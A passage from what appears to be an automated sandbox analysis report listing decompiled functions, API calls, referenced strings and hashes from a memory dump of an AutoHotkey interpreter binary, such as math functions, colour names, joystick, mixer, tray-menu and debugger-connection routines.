																} else {
																	return 0xd;
																}
															} else {
																return 0xc;
															}
														} else {
															return 0xb;
														}
													} else {
														return 0xa;
													}
												} else {
													return 9;
												}
											} else {
												return 8;
											}
										} else {
											return 7;
										}
									} else {
										return 6;
									}
								} else {
									return 5;
								}
							} else {
								return 3;
							}
						} else {
							return 2;
						}
					} else {
						return 1;
					}
				}
			}

0x0041b0e2
0x0041b365
0x0041b0f2
0x0041b102
0x0041b11a
0x0041b132
0x0041b14a
0x0041b162
0x0041b17a
0x0041b192
0x0041b1aa
0x0041b1c2
0x0041b1da
0x0041b1f2
0x0041b20a
0x0041b222
0x0041b23a
0x0041b252
0x0041b26a
0x0041b282
0x0041b29a
0x0041b2b2
0x0041b2ca
0x0041b2e2
0x0041b2fa
0x0041b312
0x0041b32a
0x0041b342
0x0041b350
0x0041b35a
0x0041b362
0x0041b344
0x0041b349
0x0041b349
0x0041b32c
0x0041b331
0x0041b331
0x0041b314
0x0041b319
0x0041b319
0x0041b2fc
0x0041b301
0x0041b301
0x0041b2e4
0x0041b2e9
0x0041b2e9
0x0041b2cc
0x0041b2d1
0x0041b2d1
0x0041b2b4
0x0041b2b9
0x0041b2b9
0x0041b29c
0x0041b2a1
0x0041b2a1
0x0041b284
0x0041b289
0x0041b289
0x0041b26c
0x0041b271
0x0041b271
0x0041b254
0x0041b259
0x0041b259
0x0041b23c
0x0041b241
0x0041b241
0x0041b224
0x0041b229
0x0041b229
0x0041b20c
0x0041b211
0x0041b211
0x0041b1f4
0x0041b1f9
0x0041b1f9
0x0041b1dc
0x0041b1e1
0x0041b1e1
0x0041b1c4
0x0041b1c9
0x0041b1c9
0x0041b1ac
0x0041b1b1
0x0041b1b1
0x0041b194
0x0041b199
0x0041b199
0x0041b17c
0x0041b181
0x0041b181
0x0041b164
0x0041b169
0x0041b169
0x0041b14c
0x0041b151
0x0041b151
0x0041b134
0x0041b139
0x0041b139
0x0041b11c
0x0041b121
0x0041b121
0x0041b104
0x0041b109
0x0041b109
0x0041b102

APIs

__wcsicoll.LIBCMT ref: 0041B0F8
__wcsicoll.LIBCMT ref: 0041B110

Strings

Chr, xrefs: 0041B10A
Cos, xrefs: 0041B25A
Sin, xrefs: 0041B242
Tan, xrefs: 0041B272
ACos, xrefs: 0041B2A2
ASin, xrefs: 0041B28A
Pow, xrefs: 0041B16A
BitOr, xrefs: 0041B2EA
Abs, xrefs: 0041B22A
BitXOr, xrefs: 0041B302
Sqrt, xrefs: 0041B19A
BitNot, xrefs: 0041B31A
Ceil, xrefs: 0041B1FA
BitShiftLeft, xrefs: 0041B332
Deref, xrefs: 0041B122
Floor, xrefs: 0041B212
Round, xrefs: 0041B1E2
Mod, xrefs: 0041B152
Asc, xrefs: 0041B0F2
ATan, xrefs: 0041B2BA
HTML, xrefs: 0041B13A
Exp, xrefs: 0041B182
BitShiftRight, xrefs: 0041B34A
BitAnd, xrefs: 0041B2D2
Log, xrefs: 0041B1B2

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: __wcsicoll
String ID: ACos$ASin$ATan$Abs$Asc$BitAnd$BitNot$BitOr$BitShiftLeft$BitShiftRight$BitXOr$Ceil$Chr$Cos$Deref$Exp$Floor$HTML$Log$Mod$Pow$Round$Sin$Sqrt$Tan
API String ID: 3832890014-879508146
Opcode ID: 89740b96c581b4a3f84165c5c4b21e6e268b39954564d48b41b8bd17e8751a2d
Instruction ID: d874470aac1def29f44c4623ff4e38d98ed1c772dc84a74aae8ac840844f3d44
Opcode Fuzzy Hash: 89740b96c581b4a3f84165c5c4b21e6e268b39954564d48b41b8bd17e8751a2d
Instruction Fuzzy Hash: BD513C15A41A1132EE21212E9D13BDF24499BE374BF85807AFC08C5382FB9D9B5991FE

Uniqueness

Uniqueness Score: -1.00%

Function 0047F7D0, Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 142COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 0047F7E8
__wcsicoll.LIBCMT ref: 0047F7FB

Strings

Maroon, xrefs: 0047F83D
Lime, xrefs: 0047F8B5
Black, xrefs: 0047F7E2
Purple, xrefs: 0047F86D
Navy, xrefs: 0047F8FD
Default, xrefs: 0047F95D
Teal, xrefs: 0047F92D
Red, xrefs: 0047F855
Aqua, xrefs: 0047F945
Olive, xrefs: 0047F8CD
Silver, xrefs: 0047F7F5
Blue, xrefs: 0047F915
Yellow, xrefs: 0047F8E5
White, xrefs: 0047F825
Gray, xrefs: 0047F80D
Fuchsia, xrefs: 0047F885
Green, xrefs: 0047F89D

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: __wcsicoll
String ID: Aqua$Black$Blue$Default$Fuchsia$Gray$Green$Lime$Maroon$Navy$Olive$Purple$Red$Silver$Teal$White$Yellow
API String ID: 3832890014-3452233305
Opcode ID: c279b1cf94a0b2135086ce37118bb0e1511b5ea0f5a54295d404b77540596894
Instruction ID: 549d2dec12dec07a7559c4c56a664af49d7a596f895c851a8f244376d5c082c8
Opcode Fuzzy Hash: c279b1cf94a0b2135086ce37118bb0e1511b5ea0f5a54295d404b77540596894
Instruction Fuzzy Hash: F3311C49E41612329E51222E5C02BEF24485FA374BFD5817EF91CD5382FB8C9A1D91AE

Uniqueness

Uniqueness Score: -1.00%

Function 0041C380, Relevance: 47.4, APIs: 14, Strings: 13, Instructions: 139COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 0041C39B
__wcsicoll.LIBCMT ref: 0041C3B1
__wcsicoll.LIBCMT ref: 0041C3CA

Strings

IDLast, xrefs: 0041C3AB
Transparent, xrefs: 0041C48C
Style, xrefs: 0041C45A
PID, xrefs: 0041C3C4
TransColor, xrefs: 0041C4A5
Count, xrefs: 0041C40F
Hwnd, xrefs: 0041C4E1
ControlList, xrefs: 0041C4C0
ProcessPath, xrefs: 0041C3F6
ExStyle, xrefs: 0041C473
MinMax, xrefs: 0041C441
ProcessName, xrefs: 0041C3DD
List, xrefs: 0041C428

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: __wcsicoll
String ID: ControlList$Count$ExStyle$Hwnd$IDLast$List$MinMax$PID$ProcessName$ProcessPath$Style$TransColor$Transparent
API String ID: 3832890014-142654100
Opcode ID: 0bb891b612396901db8ebb6589771986684be6a1d8a2de17ffc4e552c89d55e1
Instruction ID: 9f51626f0d6b5f9321bb9d80db7963b7f7df9740a660d1b97133666b3522d082
Opcode Fuzzy Hash: 0bb891b612396901db8ebb6589771986684be6a1d8a2de17ffc4e552c89d55e1
Instruction Fuzzy Hash: 89317622A8562122ED21312DBD53BEF25484B9270AF16403BFC0895386FB8CDDD651FD

Uniqueness

Uniqueness Score: -1.00%

Function 0045A3D0, Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 199COMMON

Download Yara Rule

APIs

__fassign.LIBCMT ref: 0045A426
__wcsnicmp.LIBCMT ref: 0045A44D
__fassign.LIBCMT ref: 0045A47E

Part of subcall function 0049851D: __fassign.LIBCMT ref: 00498513

__wcsicoll.LIBCMT ref: 0045A4B1

Strings

JoyName, xrefs: 0045A561
JoyY, xrefs: 0045A4C5
JoyPOV, xrefs: 0045A547
JoyInfo, xrefs: 0045A5AF
JoyU, xrefs: 0045A513
JoyAxes, xrefs: 0045A595
JoyButtons, xrefs: 0045A57B
Joy, xrefs: 0045A447
JoyX, xrefs: 0045A4AB
JoyZ, xrefs: 0045A4DF
JoyV, xrefs: 0045A52D
JoyR, xrefs: 0045A4F9

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: __fassign$__wcsicoll__wcsnicmp
String ID: Joy$JoyAxes$JoyButtons$JoyInfo$JoyName$JoyPOV$JoyR$JoyU$JoyV$JoyX$JoyY$JoyZ
API String ID: 3933591233-249873715
Opcode ID: 91c32476d5ef892c22341c3e51eb82aa16f922bc078d29c630734fbbce2b4527
Instruction ID: 1da588f8c29a72f6be9d8239b6e4351cd9a2559d3f2bf5d075d69669c790d364
Opcode Fuzzy Hash: 91c32476d5ef892c22341c3e51eb82aa16f922bc078d29c630734fbbce2b4527
Instruction Fuzzy Hash: 1841655260061026DE21216EBC06BEF66898FA375AF05417BFC04D9283F7CC9DAB50EF

Uniqueness

Uniqueness Score: -1.00%

Function 00449790, Relevance: 42.5, APIs: 17, Strings: 7, Instructions: 499COMMON

Download Yara Rule

APIs

__fassign.LIBCMT ref: 004497BB

Part of subcall function 0049A69D: wcstoxl.LIBCMT ref: 0049A6AD

__wcstoi64.LIBCMT ref: 004497F3
mixerOpen.WINMM(?,00000000,00000000,00000000,00000000), ref: 0044985F
mixerGetDevCapsW.WINMM(?,?,00000050), ref: 004498C0
_memset.LIBCMT ref: 004498E9
mixerGetLineInfoW.WINMM(?,?,00000003), ref: 0044991B
mixerClose.WINMM(?), ref: 0044992E
mixerGetLineInfoW.WINMM(?,?,00000000), ref: 00449979
mixerGetLineInfoW.WINMM(?,?,00000001), ref: 004499B6
mixerClose.WINMM(?), ref: 004499FC
mixerGetLineControlsW.WINMM(?,?,00000002), ref: 00449A8D
mixerClose.WINMM(?), ref: 00449A9C
mixerGetControlDetailsW.WINMM(?,?,00000000), ref: 00449B6E
mixerClose.WINMM(?), ref: 00449B7D
mixerSetControlDetails.WINMM(?,?,00000000), ref: 00449C42
mixerClose.WINMM(?), ref: 00449C4F
mixerClose.WINMM(?), ref: 00449D04

Strings

Can't Change Setting, xrefs: 00449C5E
Off, xrefs: 00449D31
Can't Get Current Setting, xrefs: 00449B9C, 00449BBA
Mixer Doesn't Have That Many of That Component Type, xrefs: 00449A1C, 00449A3A
Can't Open Specified Mixer, xrefs: 00449883, 0044989E
Mixer Doesn't Support This Component Type, xrefs: 00449934
Component Doesn't Support This Control Type, xrefs: 00449ABB, 00449AD9

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: mixer$Close$Line$Info$ControlDetails$CapsControlsOpen__fassign__wcstoi64_memsetwcstoxl
String ID: Can't Change Setting$Can't Get Current Setting$Can't Open Specified Mixer$Component Doesn't Support This Control Type$Mixer Doesn't Have That Many of That Component Type$Mixer Doesn't Support This Component Type$Off
API String ID: 1525579834-3049241934
Opcode ID: e391c4a2bfa0c6c04a198ab572b4b99c3e1dc71f7f4cc94a0e58cb1da1ce81f0
Instruction ID: 4fe66efb8f9a5d44e3efea4bce8a3b011c416a48fdf8a1c0f7915777e83e95ce
Opcode Fuzzy Hash: e391c4a2bfa0c6c04a198ab572b4b99c3e1dc71f7f4cc94a0e58cb1da1ce81f0
Instruction Fuzzy Hash: 6902F071608340ABE720DF55D881BABBBE4FB89710F144A2FF98497380D7799C44DB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00415460, Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 290keyboardwindowCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 004154B9
PeekMessageW.USER32 ref: 004154DC
GetTickCount.KERNEL32 ref: 00415506
GetAsyncKeyState.USER32(000000A0), ref: 00415568
GetAsyncKeyState.USER32(000000A1), ref: 0041557E
GetAsyncKeyState.USER32(000000A2), ref: 00415594
GetAsyncKeyState.USER32(000000A3), ref: 004155AA
GetAsyncKeyState.USER32(000000A4), ref: 004155C0
GetAsyncKeyState.USER32(000000A5), ref: 004155D6
GetAsyncKeyState.USER32(0000005B), ref: 004155E9
GetAsyncKeyState.USER32(0000005C), ref: 004155FC
GetAsyncKeyState.USER32(000000A0), ref: 00415732
GetAsyncKeyState.USER32(000000A1), ref: 00415748
GetAsyncKeyState.USER32(000000A2), ref: 0041575E
GetAsyncKeyState.USER32(000000A3), ref: 00415774
GetAsyncKeyState.USER32(000000A4), ref: 0041578A
GetAsyncKeyState.USER32(000000A5), ref: 004157A0
GetAsyncKeyState.USER32(0000005B), ref: 004157B3
GetAsyncKeyState.USER32(0000005C), ref: 004157C6

Strings

wM, xrefs: 0041580E
wM, xrefs: 00415644
@, xrefs: 004157BF
@, xrefs: 004155F5

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: AsyncState$CountTick$MessagePeek
String ID: wM$ wM$@$@
API String ID: 958976530-174630308
Opcode ID: 3d64b98bead02b3534b889ef877d1fbec5690a6d79692d1e5186bf914c661b6b
Instruction ID: 0fd04fb6340a9e70971f184b55ed6a3eb55634468412872852edaeea907448cd
Opcode Fuzzy Hash: 3d64b98bead02b3534b889ef877d1fbec5690a6d79692d1e5186bf914c661b6b
Instruction Fuzzy Hash: D7B1F93024D7C09AE310D725D815BEBBFA19BC2315F48446FE5D00B3D2D6A9C988DB6B

Uniqueness

Uniqueness Score: -1.00%

Function 00413CA0, Relevance: 40.4, APIs: 16, Strings: 7, Instructions: 128COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 00413CB0
__wcsicoll.LIBCMT ref: 00413CC6
__wcsicoll.LIBCMT ref: 00413CDC

Part of subcall function 00498079: __wcsicmp_l.LIBCMT ref: 004980F9

__wcsicoll.LIBCMT ref: 00413CF2
__wcsicoll.LIBCMT ref: 00413D08
__wcsicoll.LIBCMT ref: 00413D1E
__wcsicoll.LIBCMT ref: 00413D34
__wcsicoll.LIBCMT ref: 00413D4C

Strings

RIGHT, xrefs: 00413CD6
WheelRight, xrefs: 00413DD9
WheelDown, xrefs: 00413D91
LEFT, xrefs: 00413CAA
MIDDLE, xrefs: 00413D02
WheelLeft, xrefs: 00413DB5
WheelUp, xrefs: 00413D69

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: __wcsicoll$__wcsicmp_l
String ID: LEFT$MIDDLE$RIGHT$WheelDown$WheelLeft$WheelRight$WheelUp
API String ID: 3172861507-1318937625
Opcode ID: 55dd39826e0a46d646fb94abe2ff4a0104beb3462a40417fd9090ca46e1f0294
Instruction ID: ff72c77ad91e042328996f7e8464fb099161200b6c81c688ec537312a8f09b5d
Opcode Fuzzy Hash: 55dd39826e0a46d646fb94abe2ff4a0104beb3462a40417fd9090ca46e1f0294
Instruction Fuzzy Hash: E7319E55A8171131EE217A3B9D03BDF28884F92747F59007FB808D16C6FA8DDB5980BE

Uniqueness

Uniqueness Score: -1.00%

Function 004505B0, Relevance: 38.7, APIs: 11, Strings: 11, Instructions: 244COMMON

Download Yara Rule

APIs

_wcsncpy.LIBCMT ref: 00450611
__wcsicoll.LIBCMT ref: 0045066E
__wcsicoll.LIBCMT ref: 00450688
__wcsicoll.LIBCMT ref: 004506A2
__wcsicoll.LIBCMT ref: 004506BC
__wcsicoll.LIBCMT ref: 004506D6
__wcsicoll.LIBCMT ref: 004506F0
__wcsicoll.LIBCMT ref: 0045070A
__wcsicoll.LIBCMT ref: 00450724
__wcsicoll.LIBCMT ref: 0045073E
__wcsicoll.LIBCMT ref: 00450758

Strings

Str, xrefs: 00450682
AStr, xrefs: 00450738
*pP, xrefs: 00450634
Int64, xrefs: 004506EA
Double, xrefs: 0045071E
Float, xrefs: 00450704
Int, xrefs: 00450668
Ptr, xrefs: 0045069C
WStr, xrefs: 00450752
Char, xrefs: 004506D0
Short, xrefs: 004506B6

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: __wcsicoll$_wcsncpy
String ID: *pP$AStr$Char$Double$Float$Int$Int64$Ptr$Short$Str$WStr
API String ID: 1630244902-313837492
Opcode ID: 3516eeaec933e55429ca6e03ed6719aa208bb405644710f8ef9db537899d644d
Instruction ID: ecdd4ebda699c20146ed15c6e8bdbe2f0e91502cfd6c68261298671adc66691b
Opcode Fuzzy Hash: 3516eeaec933e55429ca6e03ed6719aa208bb405644710f8ef9db537899d644d
Instruction Fuzzy Hash: 9D7137AA50030556CB20DE29DC416BF7394EB85353F58442FED4886382F7BEDA4DC7AA

Uniqueness

Uniqueness Score: -1.00%

Function 0041C100, Relevance: 36.8, APIs: 11, Strings: 10, Instructions: 91COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 0041C118
__wcsicoll.LIBCMT ref: 0041C130
__wcsicoll.LIBCMT ref: 0041C146
__wcsicoll.LIBCMT ref: 0041C15C

Strings

Label, xrefs: 0041C156
Status, xrefs: 0041C1B8
Capacity, xrefs: 0041C1E8
FileSystem, xrefs: 0041C12A
Cap, xrefs: 0041C1FA
SetLabel:, xrefs: 0041C170
Serial, xrefs: 0041C188
StatusCD, xrefs: 0041C1D0
Type, xrefs: 0041C1A0
List, xrefs: 0041C112

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: __wcsicoll
String ID: Cap$Capacity$FileSystem$Label$List$Serial$SetLabel:$Status$StatusCD$Type
API String ID: 3832890014-1446549340
Opcode ID: c42482dd9e340dc94333f8e40b4cad9df56b9150b2f93f45b8ffe1beb639fe37
Instruction ID: 84ef5ec2b795afd31a3551c4ac8eaba3b4f1d51b4c35c5bb8532503ca6b89eab
Opcode Fuzzy Hash: c42482dd9e340dc94333f8e40b4cad9df56b9150b2f93f45b8ffe1beb639fe37
Instruction Fuzzy Hash: 64112C55AC161132EE11216E9D43BDF24480FA3B47F96407BBC08E5383FB8DEA5991BE

Uniqueness

Uniqueness Score: -1.00%

Function 00483940, Relevance: 33.6, APIs: 14, Strings: 5, Instructions: 345COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00483A04
__wcstoui64.LIBCMT ref: 00483A83
IsWindow.USER32(00000000), ref: 00483A9D
__wcsnicmp.LIBCMT ref: 00483AC8
__wcstoi64.LIBCMT ref: 00483AEA

Part of subcall function 004984B0: wcstoxq.LIBCMT ref: 004984D1

__wcsnicmp.LIBCMT ref: 00483B21
_wcsncpy.LIBCMT ref: 00483B54
__wcsicoll.LIBCMT ref: 00483B99
_wcsncpy.LIBCMT ref: 00483CE2
_wcsncpy.LIBCMT ref: 00483D48

Strings

group, xrefs: 00483B1B
exe, xrefs: 00483BC3
ahk_, xrefs: 004839B3, 00483C31, 00483C56, 00483D17
pid, xrefs: 00483AC2
class, xrefs: 00483BE5

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: __wcsnicmp_wcsncpy$Window__wcsicoll__wcstoi64__wcstoui64wcstoxq
String ID: ahk_$class$exe$group$pid
API String ID: 3421470534-2955265324
Opcode ID: e6341ebb33f118503a5c396fa5353862773e58dc3b2faf117649fead5badbeb9
Instruction ID: c3c1bc457628b5085226ee87a6bf1f7ce7018255afd341e9da7d30c6adc530da
Opcode Fuzzy Hash: e6341ebb33f118503a5c396fa5353862773e58dc3b2faf117649fead5badbeb9
Instruction Fuzzy Hash: AEC1E5715043019AC734AF2988457AFB6E4EF94B05F144C2FE88A97351F7BCAA84879A

Uniqueness

Uniqueness Score: -1.00%

Function 00475990, Relevance: 33.3, APIs: 11, Strings: 8, Instructions: 85windowCOMMON

Download Yara Rule

APIs

AppendMenuW.USER32 ref: 004759B3
AppendMenuW.USER32 ref: 004759C5
AppendMenuW.USER32 ref: 004759D7
AppendMenuW.USER32 ref: 004759E9
AppendMenuW.USER32 ref: 004759FB
AppendMenuW.USER32 ref: 00475A0D
AppendMenuW.USER32 ref: 00475A1F
SetMenuDefaultItem.USER32(?,0000FF14,00000000,?,?,?,?,?,?,?,?,?,?,?,00475BB8), ref: 00475A3A
AppendMenuW.USER32 ref: 00475A50
AppendMenuW.USER32 ref: 00475A62
AppendMenuW.USER32 ref: 00475A74

Strings

&Reload This Script, xrefs: 004759EE
E&xit, xrefs: 00475A67
&Pause Script, xrefs: 00475A55
&Edit This Script, xrefs: 00475A00
&Open, xrefs: 004759A6
&Window Spy, xrefs: 004759DC
&Suspend Hotkeys, xrefs: 00475A43
&Help, xrefs: 004759B8

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: Menu$Append$DefaultItem
String ID: &Edit This Script$&Help$&Open$&Pause Script$&Reload This Script$&Suspend Hotkeys$&Window Spy$E&xit
API String ID: 1113060144-2163008055
Opcode ID: e55b0dd465563c9b26503ae4efb2ad557a4178f1520d8f32fccc55461b2c172c
Instruction ID: 81a20cf4ae6ca01d61400b13b116d05e6bbee1c7e6f5d2309ae6273168207320
Opcode Fuzzy Hash: e55b0dd465563c9b26503ae4efb2ad557a4178f1520d8f32fccc55461b2c172c
Instruction Fuzzy Hash: 55216275784702B7E630A7759C42F33B2997F99B04F24493EF2896A9C196F8F4009B58

Uniqueness

Uniqueness Score: -1.00%

Function 004085EE, Relevance: 30.0, APIs: 10, Strings: 7, Instructions: 220networkCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004085F3
WSAStartup.WSOCK32(00000202,?,004D6340,00000028,004D8728), ref: 0040860D
socket.WSOCK32(00000002,00000001,00000006), ref: 0040862B
WSASetLastError.WSOCK32(00000000), ref: 0040867F
connect.WSOCK32(?,?,?), ref: 004086D0

Strings

Failed to connect to an active debugger client., xrefs: 004086A2
An internal error has occurred in the debugger engine.Continue running the script without the debugger?, xrefs: 00408617
"/>, xrefs: 0040880D
DBGP_IDEKEY, xrefs: 00408711
DBGP_COOKIE, xrefs: 00408755
<init appid="AutoHotkey" ide_key="%e" session="%e" thread="%u" parent="" language="AutoHotkey" protocol_version="1.0" fileuri=", xrefs: 004087CC
Failed to connect to an active debugger client.Continue running the script without the debugger?, xrefs: 00408877

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: ErrorH_prologLastStartupconnectsocket
String ID: "/>$<init appid="AutoHotkey" ide_key="%e" session="%e" thread="%u" parent="" language="AutoHotkey" protocol_version="1.0" fileuri="$An internal error has occurred in the debugger engine.Continue running the script without the debugger?$DBGP_COOKIE$DBGP_IDEKEY$Failed to connect to an active debugger client.$Failed to connect to an active debugger client.Continue running the script without the debugger?
API String ID: 14147331-276900959
Opcode ID: 895e2571ce56bf439ed436174a7f1bce11d350638faae127e52e4f2eb141d3ec
